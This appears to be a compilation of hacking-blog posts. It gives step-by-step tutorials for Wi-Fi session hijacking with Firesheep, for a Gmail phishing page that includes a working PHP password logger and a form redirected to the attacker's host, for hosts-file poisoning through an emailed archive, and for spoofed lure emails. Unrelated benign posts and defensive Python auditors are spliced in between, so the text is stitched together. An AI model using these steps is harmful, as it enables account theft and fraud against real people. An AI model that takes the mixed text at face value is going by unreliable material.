Information

The following is a guest post by email. This is the third part in a series of articles on his view of hacking. If you are interested in writing for CyberCROW, click Here. Otherwise, Enjoy.

Monday, April 11, 2011

How to hide the windows while running the virus code?

Good morning, friends! This will be a great day, because Break The Security got a top rank in blogger directories.

Now I am going to introduce a tool called "CMDOW". When you create and send a virus to a victim, the virus's running process may be shown to the victim. This tool will hide that as well.



About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is a 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdow's output, making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:


How to Hack Facebook account using Wi-Fi?

Posted by glewoCROW 3:24 PM

Recently, a Mozilla add-on named "Firesheep" has been used to hack thousands of email accounts. As reported by TechCrunch, Firesheep was downloaded more than 104,000 times within roughly 24 hours.

What is special about Firesheep?
Using the Firesheep add-on, you can control any account without knowing the username and password. The famous social network Facebook is a victim of Firesheep.



How?
Firesheep uses HTTP session hijacking to gain the username and password.

What is HTTP Session Hijacking?
Attackers use HTTP session hijacking to steal cookies from the victim. Cookies are files which contain the password and username.

Using this HTTP session hijacking method, you can hack Facebook, Google, Yahoo, Orkut, Flickr etc. or any other email account.

How to use this Firesheep to steal the cookies?
 You will need this requirements:


Step 1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.



Step 2:

Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep


Step 3:

Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly
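
Firesheep depends on session cookies crossing the Wi-Fi network over unencrypted HTTP, so a site owner can test for exactly that condition. The following is an added example, not part of the original post: it audits response headers for session cookies that lack transport protection. The URLs, cookie names and the SESSION_HINTS list are constructed assumptions.

```python
"""Audit HTTP response headers for session cookies exposed to Wi-Fi sniffing."""

# Substrings that mark a cookie as a session identifier. Assumption for this
# example; replace with the cookie names your application really issues.
SESSION_HINTS = ("sess", "sid", "auth", "token")

# Constructed sample: (URL, [(header name, header value), ...]) per response.
SAMPLE_RESPONSES = [
    ("http://social.example/home",
     [("Set-Cookie", "sessionid=abc123; Path=/")]),
    ("https://social.example/login",
     [("Set-Cookie", "sessionid=abc123; Path=/; HttpOnly"),
      ("Set-Cookie", "lang=en; Path=/")]),
    ("https://mail.example/",
     [("Strict-Transport-Security", "max-age=31536000"),
      ("Set-Cookie", "auth_token=xyz; Path=/; Secure; HttpOnly; SameSite=Lax")]),
]


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if not parts:
        return "", {}
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_response(url, headers):
    """Return findings for one response; an empty list means nothing to fix."""
    over_https = url.lower().startswith("https://")
    header_names = {h.lower() for h, _ in headers}
    findings = []
    session_seen = False
    for header, value in headers:
        if header.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        if not any(hint in name.lower() for hint in SESSION_HINTS):
            continue  # preference cookies and the like are not hijack targets
        session_seen = True
        if not over_https:
            findings.append(f"{name}: set over plain HTTP")
        if "secure" not in attrs:
            findings.append(f"{name}: missing Secure")
        if "httponly" not in attrs:
            findings.append(f"{name}: missing HttpOnly")
    # Without HSTS a browser may still make a first request over HTTP.
    if (session_seen and over_https
            and "strict-transport-security" not in header_names):
        findings.append("no Strict-Transport-Security header")
    return findings


def audit_all(responses):
    """Map each URL to its findings, skipping clean responses."""
    report = {}
    for url, headers in responses:
        findings = audit_response(url, headers)
        if findings:
            report[url] = findings
    return report


if __name__ == "__main__":
    for url, findings in audit_all(SAMPLE_RESPONSES).items():
        for finding in findings:
            print(f"{url}: {finding}")
```

A session cookie marked Secure is never sent over plain HTTP, which removes it from what a passive listener on the same network can capture.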

How to create fake or Phishing web page for gmail



 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.
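
The cloned page described above differs from the real one in a way a defender can check: the form that holds the password field no longer posts to the legitimate host. The following is an added example, not part of the original post, of a check a mail gateway or link scanner could apply to a fetched page. The host login-update.example, the HTML snippets and the allowed-domain list are constructed assumptions.

```python
"""Flag login forms that send a password somewhere other than the real site."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Domains allowed to receive the password (assumption: supplied by the defender
# for the brand the page claims to be).
ALLOWED = ("google.com",)

# Constructed samples: the genuine form target quoted in the post, and a clone.
REAL_URL = "https://www.google.com/accounts/ServiceLogin"
REAL_HTML = ('<form action="https://www.google.com/accounts/ServiceLoginAuth" '
             'method="post"><input type="text" name="Email">'
             '<input type="password" name="Passwd"></form>')
CLONE_URL = "http://login-update.example/index.html"
CLONE_HTML = ('<form action="http://login-update.example/login.php">'
              '<input type="text" name="Email">'
              '<input type="password" name="Passwd"></form>')


class PasswordFormFinder(HTMLParser):
    """Record the action attribute of each <form> holding a password input."""

    def __init__(self):
        super().__init__()
        self.actions = []     # actions of forms that contain a password field
        self._action = None   # action of the open form, until it is recorded

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._action = attrs.get("action") or ""
        elif (tag == "input" and self._action is not None
              and (attrs.get("type") or "").lower() == "password"):
            self.actions.append(self._action)
            self._action = None   # one record per form is enough

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None


def host_allowed(host, allowed_domains):
    """True when host equals an allowed domain or is a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def check_page(page_url, html, allowed_domains):
    """Return findings for every password form on the page."""
    finder = PasswordFormFinder()
    finder.feed(html)
    finder.close()
    findings = []
    for action in finder.actions:
        # Relative and empty actions resolve against the page's own URL.
        target = urlsplit(urljoin(page_url, action))
        if target.scheme != "https":
            findings.append(f"password posted without TLS: {target.geturl()}")
        if not host_allowed(target.hostname, allowed_domains):
            findings.append(f"password posted off-domain: {target.hostname}")
    return findings


if __name__ == "__main__":
    for label, url, html in (("real", REAL_URL, REAL_HTML),
                             ("clone", CLONE_URL, CLONE_HTML)):
        print(label, check_page(url, html, ALLOWED))
```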

Different types of Email Account Hacking

Posted by glewoCROW 2:45 PM


The basic level of hacking is email account hacking. Everyone likes to start with email account hacking. So here is a tutorial for budding hackers about email hacking.

There are different types of email account hacking. Here are some of them:

  1. Social Engineering
    • Phishing
  2. Brute Force Attack
  3.  Keylogger
  4.  Guessing the Answer for the Security Question


Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social engineering is different from physical security exploits. In social engineering, hackers analyze the victim.
Hackers send mail to the victim, with contents related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits cross-site
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:

     It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that mail sites ask security questions to recover a mail account? You can hack the mail account simply by guessing the answer. If the victim is your friend, then it may be very easy to hack.

Brute Force Attack:



A famous and traditional attack method. In this method, the password is found by trying all possible passwords with a program or software.




Keyloggers:


  It is a kind of spyware which captures what you type on the keyboard. So whenever you type the username and password, it simply captures them.

   It is a software program which is attached to other software and sent to the victim. When the victim installs the software, the keylogger also starts to work. Keyloggers are exe files.



Note:
This Email Account Hacking Tutorial is truly for educational purpose only.

Use Original Domain Address for Phishing Web page

Hi friends, you may already know how to create a phishing web page. If you don't know about phishing web pages, you need to read this tutorial first:
Once you know the basics of phishing web pages, come back to this post.

OK friends, there's one drawback in our traditional phishing web page method. Do you know what it is? You are right: the URL of our phishing web page. It may look like the real one, but it is not.


For example, we may create the phishing web page with www.gmails.com, but it's not at all the same as www.gmail.com.

Experienced internet users will probably notice the URL of the web page, so they won't fall into our fishnet.

What are we going to do now?
Why shouldn't we make the phishing web page's URL look exactly the same as the real domain name? You may ask, "Is it possible?" My answer is yes, you can. Sounds good, right? Go ahead.

How we are going to implement?

 We are going to send an email with an executable to victim.
If the victim double click the executable file, then you are done.
Now whenever the victim enter the real domain name (like www.facebook.com) ,he will be in our phishing web page.
Don't worry the domain name is original URL(like www.facebook.com)

Got surprised....!!!! You may ask how this is done,go ahead.

How it is done?
   The executable file will change the hosts file of the victim's system.
What is the hosts file?
     The hosts file contains domain names and the IP addresses associated with them. Your hosts file will be in this path:
C:\Windows\System32\drivers\etc\

Whenever we enter a domain name or URL (e.g. www.webaddress.com), a query is sent to the DNS (Domain Name Server). The DNS connects to the IP address which is associated with the domain name. But before this is done, the hosts file on our system is checked for an IP address associated with the domain name. Suppose we make an entry with the domain name and the IP address of our phishing web page (e.g. www.webaddress.com with our IP 123.23.X.X); then no query will be sent to the DNS.
It will automatically connect to the IP address associated with the domain name. This is fruitful for us, as it masks the phishing web page's URL with the original domain name.


Now Let's divide into the Implementation:
  • If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address.

So what you can do overcome this problem? You need to set up your own Webserver in home. Using Webserver softwares you can set up your own Hosting service.

  Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.


How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:
C:\Wamp\WWW
And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :
your_ip     domain_name
For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
 
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:







Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.


Some Disadvantages of this Hack:
  •    If your IP address changes dynamically, then it is hard to implement.
  •   If your victim is an advanced user, he may notice the site certificates shown by the browser.
Don't worry, it is not at all a big problem. Just try it and enjoy it.
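
Because the hosts file is consulted before DNS, an unexpected entry for a well-known site is a reliable sign of tampering. The following is an added example, not part of the original post, that audits hosts-file text for such entries. The watched-domain list and the sample file are constructed assumptions, and the addresses come from a documentation-only range.

```python
"""Audit a hosts file for entries that redirect well-known sites."""
import ipaddress

# Directory given in the post; the file inside it is named "hosts".
HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"

# Domains that should never be pinned in a hosts file (assumption: extend
# this with the banking, mail and SSO domains your users rely on).
WATCHED = ("gmail.com", "facebook.com", "google.com")

# Constructed sample; 203.0.113.0/24 is a documentation-only address range.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.tracker.example   # sinkhole added by an ad blocker
203.0.113.7     www.gmail.com
203.0.113.7     www.facebook.com facebook.com
192.168.1.20    nas.home.example
not-an-ip       www.google.com
"""


def parse_hosts(text):
    """Yield (line number, ip, hostname) for each valid mapping in the text."""
    for number, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()   # drop trailing comments
        if len(fields) < 2:
            continue  # blank line, comment, or address with no name
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address, so not a usable mapping
        for name in fields[1:]:
            yield number, ip, name.lower().rstrip(".")


def audit_hosts(text, watched=WATCHED):
    """Return (line, ip, name) for watched domains pinned to a real address.

    Loopback and 0.0.0.0 entries are treated as blocklist sinkholes and are
    not reported (assumption of this example).
    """
    findings = []
    for number, ip, name in parse_hosts(text):
        is_watched = any(name == d or name.endswith("." + d) for d in watched)
        if is_watched and not (ip.is_loopback or ip.is_unspecified):
            findings.append((number, str(ip), name))
    return findings


def audit_file(path=HOSTS_PATH, watched=WATCHED):
    """Audit the hosts file on disk."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return audit_hosts(handle.read(), watched)


if __name__ == "__main__":
    for number, ip, name in audit_hosts(SAMPLE_HOSTS):
        print(f"line {number}: {name} is pinned to {ip}")
```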

Temporary Disposable Email address Services

Posted by glewoCROW 2:21 PM

 While signing up to an online account or doing such stuff on web, you can use these temporary disposable email addresses provided by email services. This keeps your real email address protected from spam. These services provide you with email addresses of the format you desire. Temporary email addresses last for time duration varying from few hours to some months, depending on the type of service you use.

6 Best Temporary Disposable Email address providers:

Just check out the below list for some of the best disposable email address services:


1. Mailinator:
This is one of the top-rated temporary email providers, which provides you an address of the format something@mailinator.com

2. Yopmail:
Another temporary email address service with a good, user-friendly email interface. I have tried many services and found Yopmail to have one of the best interfaces. What's more, you don't need any cumbersome registration process. Simply enter any desired email address and Yopmail has it.

3. Spamgourmet:
This is an efficient spam-blocking temporary email address service which has also got good reviews elsewhere on the web.

4. Jetable:
This is a multi-functional temporary inbox provider which allows you to define the time span for which your temporary inbox will be valid. Also, you can forward the temporary inbox mails to your real email address.

5. Spambox:
One of the best features of this service is that the time span of a disposable email address can be as long as 1 year. This is really a large span. It provides all the other features of a temporary email address.

6. Mailexpire:
Create an alias email address for your real email address. Mailexpire provides you temporary email address for as long as 3 months. If you want to delete alias mail id instantly, you are always provided with a link to delete your alias temporary disposable email address.

You can now send a self destruction Email from Big string

Posted by glewoCROW 2:18 PM

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.

This is a great trick for you. You can now send a self-destructing email. After the user reads the mail, the mail will be deleted automatically. You might remember the world-famous scene from Mission Impossible in which, after the message has been heard once, the message destroys itself. Now it is possible for everybody to have such a facility.
 

How you are getting large number of spam mail ? Know why

Posted by glewoCROW 2:11 PM

Are you getting a lot of spam mail in your inbox? Do you know why it comes to your mail? The mistake is yours. You are getting a large amount of spam because of your own actions. How are you responsible for that? Read on to find out what your mistake is.

Spam Mail Definition:
Also known as junk mail. Spam is the sending of a large number of identical messages to numerous recipients. Advertisers and merchants send large numbers of mails to recipients for advertising purposes using software and some websites.



How do they get your email ID?
They get your mail ID because of your own mistakes.

Social Networking Sites:
Most of you use social networking sites daily. I won't say using social networking sites is bad. But sending requests to strangers or accepting requests from them is one of the major reasons for getting spam mail. Advertisers will exploit your weakness. If you blindly accept requests, spam will definitely arrive in your mail. Sometimes they get your phone number and send advertisements to your mobile or some other communication channel.

What do you have to do?
Apply privacy settings to your contact information. Don't accept requests from strangers (in order to attract you, they may send you a request posing as a girl).

Online Games and contests:
Some websites tell you that they will give a prize if you win an online game. This is also one of the reasons for getting spam mail.

Job /Career websites:
Job-offering websites are a major reason for getting spam mail. Some websites sell your mail ID to advertisers. This results in spam.

Forum:
As I said for social networking sites, in forums you also have to consider the privacy settings.

Select "Don't show mail and Don't receive mail from members" so that you can avoid getting spam mail.

Mail Searching:
Advertisers (spammers) search for mail IDs on the internet using software (like @mail.com).
If you are a webmaster, you may give a contact-us link with
mailto:mailid@domain.com.
Spammers can find your mail ID if you give it plainly like this.
 Tips:
  • Use 123 contact forms to hide your mail ID.
  • Or show the mail ID like this: mailid[at]domain[dot]com
  • Use a mail badge image (I mean, show your mail ID as an image).

Overall suggestion:
Use two mail IDs. One is for contributing online. The other one is personal.

How to Access Multiple Gmail accounts in Firefox without logout?

Posted by glewoCROW 2:04 PM

Do you have multiple Gmail accounts? As far as browsers are concerned, we can log in with only one Gmail account. Here I am going to introduce a Mozilla add-on. This add-on will allow you to log in to multiple accounts without logging out of the others.



How to do?

visit:
and Install the Add on.

Now visit:
click on “Install” button located at the top right side.


Now you can access multiple gmail accounts. You can see the drop down box at the top right side.

Change the user as you wish without logging out.

Enjoy !

Don't trust all scripts. Sometimes these scripts will be harmful to you. So verify that a script is not harmful by searching on Google.

How to send Anonymous Mail to anyone|Set up your own server

Posted by glewoCROW 11:21 AM


Everyone likes to send anonymous mail to an enemy, friend or teacher. Here is the hacking tutorial for you to implement that. I hope this will be the best hack for you.

What is the Use?
   I explained in my older post how to get an IP address. To get the IP address, you need to send a mail with a link. So you can send mail to your victim with that link as if you were contacting them from an organization.

For Eg:
You can say: we are from Facebook, we have a new feature; to enable the feature, visit this page.

How to do?

Step 1:
First of all you need to register in free web hosting service which has PHP feature.  So my choice is

Step 2:
Now Download this zip file:

             Mail.php
Inside the file you can find the mail.php file. Extract the file

Step 3:
Now Go to x10hosting.com and login with your username and password.
Upload the "mail.php" file to "public_html" folder.

Step 4:
That's all you finished.
Now go to this page
         yourhosturl/mail.php
Change the yourhosturl with your website url which you gave it when you register in x10hosting.com
For eg:
yourfavorites.x10.mx/mail.php

Usually the default will be "name.x10.mx"

When you visit you will see the form just like this:


Fill the form with your victim mail address and message subject and send